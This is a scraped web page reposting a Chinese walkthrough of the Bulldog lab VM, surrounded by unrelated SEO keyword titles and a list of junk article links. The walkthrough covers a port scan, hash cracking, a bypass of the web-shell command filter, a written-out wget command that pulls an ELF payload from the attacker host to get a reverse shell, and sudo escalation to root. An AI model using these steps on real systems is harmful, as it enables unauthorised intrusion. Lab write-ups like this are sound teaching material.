当前位置: 首页 > news >正文

龙华新区城市建设局网站wordpress修改标题

龙华新区城市建设局网站,wordpress修改标题,做视频网站被判刑,群辉 搭建wordpress声明 文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为! 开搞 首先nmap扫描目标机开放端口和服务 访问80端口 扫目录撒 发现登录口 点击web-shell提示登录后才能使用 /dev/下面查看网页源码发现村咋h…

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

开搞

首先nmap扫描目标机开放端口和服务

在这里插入图片描述

访问80端口

在这里插入图片描述

扫目录撒

在这里插入图片描述

发现登录口

在这里插入图片描述
在这里插入图片描述
点击web-shell提示登录后才能使用

在这里插入图片描述

/dev/下面查看网页源码发现村咋hash值

在这里插入图片描述

awk提取hash

把那堆复制到1.txt中提取
在这里插入图片描述

在线解密

https://crackstation.net/
在这里插入图片描述

nick/bulldog登录

在这里插入图片描述

进入web-shell

可以执行命令
在这里插入图片描述
但是很多命令不让用
在这里插入图片描述
可以用echo `curl` 的方法绕过限制
在这里插入图片描述

创建反弹shell

python起个服务

在这里插入图片描述

wget下载到目标

echo `wget http://192.168.2.129:5555/5555.elf`

在这里插入图片描述

msf建立监听

在这里插入图片描述

给5555.elf添加执行权限并执行

在这里插入图片描述

拿到shell

在这里插入图片描述

进入shell

在这里插入图片描述

查看家目录有啥

在这里插入图片描述

查看hiddenadmindirectory

查看note
在这里插入图片描述

密码藏在customPermissionApp

SUPERultimatePASSWORDyouCANTget
在这里插入图片描述

结束

因为这个文件是bulldogadmin的文件,我的身份是django,所以需要sudo 去给他加执行权限,sudo chmod 777 customPermissionApp就要用到django的密码
执行后变成了root权限
靶标一般就在root目录下
在这里插入图片描述

http://www.yayakq.cn/news/395748/

相关文章:

  • 万润 企业网站建设邳州微网站开发
  • aspcms网站打不开品牌羽绒服排名前十
  • 网站与后台网站如何做词
  • 查询海外whois的网站wordpress 4.7
  • 制作自己的网站代码吗云南微网站搭建
  • 湖南建设厅网站二建注销济南网站制作工作室
  • 甜品网站建设方案华与建设集团有限公司网站
  • 网站建设南京公司网站建设有哪些好用的网站
  • 做视频网站怎么挣钱专业网站设计制作价格
  • 建材网站建设 南宁苏州注册公司可以用住宅地址吗
  • 哪个浏览器可以看禁止网站门户网站建设的重要作用
  • 自己找网站开发项目做ppt网站动态
  • 分析网站的优势和不足wordpress支付查看更多
  • 建设中英文网站网站书店建设背景
  • html5响应式布局网站php网站开发自学
  • 培训学校网站莱芜网络推广公司排行
  • 动感地带套餐seo费用
  • 厦门高端网站建设公成都网站制作培训多少钱
  • 邯郸网站建设好的公司wordpress-erphpdown
  • 网站如果实现微信支付吗网站开发需求网
  • 菏泽市建设局网站电话网站的服务有哪些
  • 网站策划总结wordpress点赞功能纯代码
  • 做自媒体搬运文章的网站支部品牌建设实施方案
  • 张家口百度免费做网站用discuz做商城网站
  • 网络班级网站建设优化大师apk
  • 高明网站设计收费创意设计图片
  • 怎么查找网站是谁做的网址查询ip解析
  • 青海网站开发建设wordpress标签字段
  • 网站开发制作费用网络营销是什么模式
  • 电商网站开发周期wordpress前端插件